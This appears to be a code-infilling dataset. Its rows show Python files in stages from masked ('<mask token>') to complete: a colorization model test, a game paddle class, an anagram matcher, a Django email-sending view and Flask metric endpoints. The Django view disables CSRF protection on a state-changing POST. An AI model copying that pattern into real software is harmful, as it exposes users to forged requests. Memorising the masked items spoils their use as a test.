from mmagic.registry import MODELS
def test_colorization_net():
model_cfg = dict(type='ColorizationNet', input_nc=4, output_nc=2,
norm_type='batch')
model = MODELS.build(model_cfg)
assert model.__class__.__name__ == 'ColorizationNet'
input_A = torch.rand(1, 1, 256, 256)
input_B = torch.rand(1, 2, 256, 256)
mask_B = torch.rand(1, 1, 256, 256)
target_shape = 1, 2, 256, 256
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
assert feature_map['conv1_2'].shape == (1, 64, 256, 256) and feature_map[
'out_reg'].shape == target_shape
if torch.cuda.is_available():
model = model.cuda()
input_A = input_A.cuda()
input_B = input_B.cuda()
mask_B = mask_B.cuda()
out_class, out_reg, feature_map = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
for item in feature_map.keys():
assert torch.is_tensor(feature_map[item])
| # Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmagic.registry import MODELS
def test_colorization_net():
model_cfg = dict(
type='ColorizationNet', input_nc=4, output_nc=2, norm_type='batch')
# build model
model = MODELS.build(model_cfg)
# test attributes
assert model.__class__.__name__ == 'ColorizationNet'
# prepare data
input_A = torch.rand(1, 1, 256, 256)
input_B = torch.rand(1, 2, 256, 256)
mask_B = torch.rand(1, 1, 256, 256)
target_shape = (1, 2, 256, 256)
# test on cpu
(out_class, out_reg, feature_map) = model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
assert feature_map['conv1_2'].shape == (1, 64, 256, 256) \
and feature_map['out_reg'].shape == target_shape
# test on gpu
if torch.cuda.is_available():
model = model.cuda()
input_A = input_A.cuda()
input_B = input_B.cuda()
mask_B = mask_B.cuda()
(out_class, out_reg, feature_map) = \
model(input_A, input_B, mask_B)
assert isinstance(feature_map, dict)
for item in feature_map.keys():
assert torch.is_tensor(feature_map[item])
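# Editor's note: runnable inside an MMagic checkout with, e.g.,
#   pytest -q -k test_colorization_net
# the CUDA branch is skipped automatically on CPU-only machines.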
| null | [
0,
1,
2,
3
] |
619 | cb3c1adb9d91aecee5b21774d61dfe9400a330fa | <mask token>
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
<mask token>
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| <mask token>
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.
center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.
color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| <mask token>
PADDLE_WIDTH = 15
PADDLE_HEIGHT = 30
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.
center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.
color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| from point import Point
from velocity import Velocity
import arcade
import config
PADDLE_WIDTH = 15
PADDLE_HEIGHT = 30
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.
center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.
color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + config.PADDLE_HEIGHT / 2:
self.center.y = self.center.y - self.velocity.dy
| from point import Point
from velocity import Velocity
import arcade
import config
PADDLE_WIDTH = 15
PADDLE_HEIGHT = 30
class Paddle:
def __init__(self):
self.center = Point(390, 50)
self.velocity = Velocity(0, 5)
def draw(self):
self.drawing = arcade.draw_rectangle_filled(self.center.x, self.center.y, config.PADDLE_WIDTH, config.PADDLE_HEIGHT, arcade.color.ELECTRIC_LIME)
def move_up(self):
if self.center.y < config.SCREEN_HEIGHT - (config.PADDLE_HEIGHT / 2):
self.center.y = self.center.y + self.velocity.dy
def move_down(self):
if self.center.y > 0 + (config.PADDLE_HEIGHT / 2):
self.center.y = self.center.y - self.velocity.dy
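# Usage sketch (editor's note; Point, Velocity and the config constants come
# from the project's own modules):
#   paddle = Paddle()
#   paddle.move_up()    # center.y: 50 -> 55, since velocity.dy == 5
# move_up/move_down clamp center.y to
# [PADDLE_HEIGHT / 2, SCREEN_HEIGHT - PADDLE_HEIGHT / 2].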
| [
4,
5,
6,
7,
8
] |
620 | 44224985dbfa6234eff406149ce25e1d00b512e9 | class Anagram(object):
<mask token>
<mask token>
<mask token>
def match(self, words):
return filter(self._is_anagram, words)
| class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
<mask token>
<mask token>
def match(self, words):
return filter(self._is_anagram, words)
| class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
<mask token>
def _is_anagram(self, word):
return word != self.word and self._canonicalize(word) == self.canonical
def match(self, words):
return filter(self._is_anagram, words)
| class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
def _canonicalize(self, word):
return sorted(word.lower())
def _is_anagram(self, word):
return word != self.word and self._canonicalize(word) == self.canonical
def match(self, words):
return filter(self._is_anagram, words)
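# Usage sketch (editor's note): match() skips the word itself and, on
# Python 3, returns a lazy filter object, so materialise it with list():
#   list(Anagram('listen').match(['enlists', 'google', 'inlets', 'listen']))
#   # -> ['inlets']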
| null | [
2,
3,
4,
5
] |
621 | c2839046592469dfae7526f72be947126960ba19 | <mask token>
| <mask token>
@login_required
@csrf_exempt
def social(request):
if request.method == 'POST':
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute(
'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'
, [project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print('SENDING')
with connection.cursor() as curr:
curr.execute('select contact from customer where customer_id = %s',
[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained, pwd) == True:
send_mail(head, subhead + '\n' + content, 'Gauri Baraskar',
'[email protected]', settings.EMAIL_HOST_USER,
obtained)
else:
messages.warning(request, 'Wrong Password Entered')
return JsonResponse(1, safe=False)
else:
with connection.cursor() as curr:
curr.execute(
'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'
, [request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
| from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from projects.models import Project
from django.db import connection
from .utils import namedtuplefetchall
from django.http import JsonResponse
from django.contrib import messages
import json
from django.views.decorators.csrf import csrf_exempt
from .utils import send_mail
from DBMS import settings
from passlib.hash import pbkdf2_sha256 as encrypto
@login_required
@csrf_exempt
def social(request):
if request.method == 'POST':
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute(
'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'
, [project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print('SENDING')
with connection.cursor() as curr:
curr.execute('select contact from customer where customer_id = %s',
[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained, pwd) == True:
send_mail(head, subhead + '\n' + content, 'Gauri Baraskar',
'[email protected]', settings.EMAIL_HOST_USER,
obtained)
else:
messages.warning(request, 'Wrong Password Entered')
return JsonResponse(1, safe=False)
else:
with connection.cursor() as curr:
curr.execute(
'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'
, [request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
| from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
from projects.models import Project
from django.db import connection
from .utils import namedtuplefetchall
from django.http import JsonResponse
from django.contrib import messages
import json
from django.views.decorators.csrf import csrf_exempt
from .utils import send_mail
from DBMS import settings
from passlib.hash import pbkdf2_sha256 as encrypto
# Create your views here.
@login_required
@csrf_exempt
def social(request):
if request.method == "POST":
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute("SELECT manager_id,customer_id FROM socialMedia where project_id=%s",[project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print("SENDING")
with connection.cursor() as curr:
curr.execute("select contact from customer where customer_id = %s",[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
# Rename the email field with customer_email to send to customers when we have actual data
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained,pwd) == True:
#print("asjdhasd")
send_mail(head,subhead+'\n'+content,'Gauri Baraskar','[email protected]',settings.EMAIL_HOST_USER,obtained)
else:
messages.warning(request,"Wrong Password Entered")
return JsonResponse(1,safe=False)
else:
with connection.cursor() as curr:
curr.execute("select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id",[request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
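# Editor's sketch: .utils is not shown here, but namedtuplefetchall is
# presumably the standard Django-docs cursor recipe, roughly:
#
#   from collections import namedtuple
#
#   def namedtuplefetchall(cursor):
#       desc = cursor.description
#       Result = namedtuple('Result', [col[0] for col in desc])
#       return [Result(*row) for row in cursor.fetchall()]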
| null | [
0,
1,
2,
3
] |
622 | 1431a0049c05a99e0b68052f56bf8e2e3c48e1aa | <mask token>
class QuantModelMetricsResource(MetricsResource):
<mask token>
<mask token>
<mask token>
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include specific query parameters to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete a metric result matching the provided metric_id and cob_date.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
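# Example requests (editor's sketch; host, port and id are placeholders, and
# the JSON body fields come from the Metric schema, which is not shown here):
#   curl http://localhost:5000/metrics/42
#   curl -X PUT http://localhost:5000/metrics/42 \
#        -H 'Content-Type: application/json' -d '<partial metric JSON>'
#   curl -X DELETE http://localhost:5000/metrics/42
# PUT rejects an empty payload, and both PUT and DELETE abort with 400 on a
# database error.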
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| <mask token>
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this model endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library ==
pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete the metric matching the provided metric_id.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| <mask token>
class MetricsResource(BaseResource):
<mask token>
def get(self):
"""
Implements the GET method for endpoint "/metrics". By default the results are
ordered by 'metric_id' ascending.
Implemented Query Parameters:
- is_active: to filter results that are either active or inactive. Boolean and
case insensitive.
- frequency: filter results based on a metric frequency. Values of this enum must
be respected. Case insensitive.
- threshold_type: filter results based on a metric threshold type. Values of this
enum must be respected. Case insensitive.
- sort: allows one to order the resulting collection by 'metric_id' in descending
order. This should be done by specifying the query parameter as "sort=-metric_id".
Case insensitive.
Note: if unknown query parameters are given these will be ignored.
:return: a collection of metrics
"""
query = self.build_query()
metrics = query.all()
result = self.schema_collection.dump(metrics)
return success(result)
def build_query(self):
"""
Builds the query (without executing it) to be used in the GET method.
:return: query with all the query conditions specified for obtaining the metrics
that are in the database and respect the desired filters (query parameters).
"""
query = Metric.query.filter(Metric.metric_type == self.metric_type)
is_active = request.args.get('is_active')
frequency = request.args.get('frequency')
threshold_type = request.args.get('threshold_type')
sort = request.args.get('sort')
if is_active is not None:
is_active = is_active.lower() == 'true'
query = query.filter_by(is_active=is_active)
if frequency is not None:
try:
frequency = Frequency.from_name(frequency)
except ValueError as e:
msg = (
f"Invalid 'frequency': {frequency}. Use one of {Frequency.values()}"
)
abort(400, message=msg)
query = query.filter_by(frequency=frequency)
if threshold_type is not None:
try:
threshold_type = ThresholdType.from_name(threshold_type)
except ValueError as e:
msg = (
f"Invalid 'threshold_type': {threshold_type}. Use one of {ThresholdType.values()}"
)
abort(400, message=msg)
query = query.filter_by(threshold_type=threshold_type)
if sort is not None and sort.lstrip('-') == 'metric_id':
query = query.order_by(Metric.metric_id.desc())
else:
query = query.order_by(Metric.metric_id)
return query
def post(self):
"""
Implements the POST method for endpoint "/metrics". It should be used to create a
new metric.
:return: the created metric as a json (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
json_data['metric_id'] = 'TBD'
json_data['metric_type'] = 'model'
new_metric = self.load(json_data, session=db.session)
try:
db.session.add(new_metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
result = self.schema.dump(new_metric)
return success(result, code=201)
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this model endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library ==
pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete the metric matching the provided metric_id.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| from flask import request
from flask_restful import abort
from sqlalchemy.exc import SQLAlchemyError
from gm.main.models.model import db, Metric, QuantModelMetricSchema, MlModelMetricSchema, Frequency, QuantModelMetric, MlModelMetric, ThresholdType
from gm.main.resources import success, get_metric_by_id, BaseResource
class MetricsResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def get(self):
"""
Implements the GET method for endpoint "/metrics". By default the results are
ordered by 'metric_id' ascending.
Implemented Query Parameters:
- is_active: to filter results that are either active or inactive. Boolean and
case insensitive.
- frequency: filter results based on a metric frequency. Values of this enum must
be respected. Case insensitive.
- threshold_type: filter results based on a metric threshold type. Values of this
enum must be respected. Case insensitive.
- sort: allows one to order the resulting collection by 'metric_id' in descending
order. This should be done by specifying the query parameter as "sort=-metric_id".
Case insensitive.
Note: if unknown query parameters are given these will be ignored.
:return: a collection of metrics
"""
query = self.build_query()
metrics = query.all()
result = self.schema_collection.dump(metrics)
return success(result)
def build_query(self):
"""
Builds the query (without executing it) to be used in the GET method.
:return: query with all the query conditions specified for obtaining the metrics
that are in the database and respect the desired filters (query parameters).
"""
query = Metric.query.filter(Metric.metric_type == self.metric_type)
is_active = request.args.get('is_active')
frequency = request.args.get('frequency')
threshold_type = request.args.get('threshold_type')
sort = request.args.get('sort')
if is_active is not None:
is_active = is_active.lower() == 'true'
query = query.filter_by(is_active=is_active)
if frequency is not None:
try:
frequency = Frequency.from_name(frequency)
except ValueError as e:
msg = (
f"Invalid 'frequency': {frequency}. Use one of {Frequency.values()}"
)
abort(400, message=msg)
query = query.filter_by(frequency=frequency)
if threshold_type is not None:
try:
threshold_type = ThresholdType.from_name(threshold_type)
except ValueError as e:
msg = (
f"Invalid 'threshold_type': {threshold_type}. Use one of {ThresholdType.values()}"
)
abort(400, message=msg)
query = query.filter_by(threshold_type=threshold_type)
if sort is not None and sort.lstrip('-') == 'metric_id':
query = query.order_by(Metric.metric_id.desc())
else:
query = query.order_by(Metric.metric_id)
return query
def post(self):
"""
Implements the POST method for endpoint "/metrics". It should be used to create a
new metric.
:return: the created metric as a json (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
json_data['metric_id'] = 'TBD'
json_data['metric_type'] = 'model'
new_metric = self.load(json_data, session=db.session)
try:
db.session.add(new_metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
result = self.schema.dump(new_metric)
return success(result, code=201)
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this model endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library ==
pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
